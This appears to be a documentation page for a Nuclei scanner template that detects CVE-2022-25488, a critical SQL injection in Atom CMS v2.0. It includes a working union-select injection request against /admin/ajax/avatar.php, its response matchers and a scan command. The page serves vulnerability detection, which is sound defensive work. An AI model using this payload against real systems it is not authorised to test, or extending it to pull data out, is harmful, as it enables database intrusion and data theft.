Atom CMS v2.0 - SQL Injection
ID: CVE-2022-25488
Severity: critical
Author: theamanrawat
Tags: cve,cve2022,sqli,atom,cms,thedigitalcraft
Description
Section titled “Description”Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.
YAML Source
Section titled “YAML Source”id: CVE-2022-25488
info: name: Atom CMS v2.0 - SQL Injection author: theamanrawat severity: critical description: | Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/257 - https://nvd.nist.gov/vuln/detail/CVE-2022-25488 - https://github.com/ARPSyndicate/cvemon - https://github.com/superlink996/chunqiuyunjingbachang classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25488 cwe-id: CWE-89 epss-score: 0.0161 epss-percentile: 0.87161 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thedigitalcraft product: atomcms tags: cve,cve2022,sqli,atom,cms,thedigitalcraftvariables: num: "999999999"
http: - method: GET path: - "{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"
matchers-condition: and matchers: - type: word part: body words: - "/{{md5(num)}}" - "avatar-container" condition: and
- type: status status: - 200# digest: 4a0a0047304502201fbf64180e01451e90ee0a2734bc5aceb20b2a5ab431eeb5e6643064605faf250221009df5452ddd47cf3969fc2bdca25529dfb7e9c1f6285bb0230336b7f3aa7275a1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25488.yaml"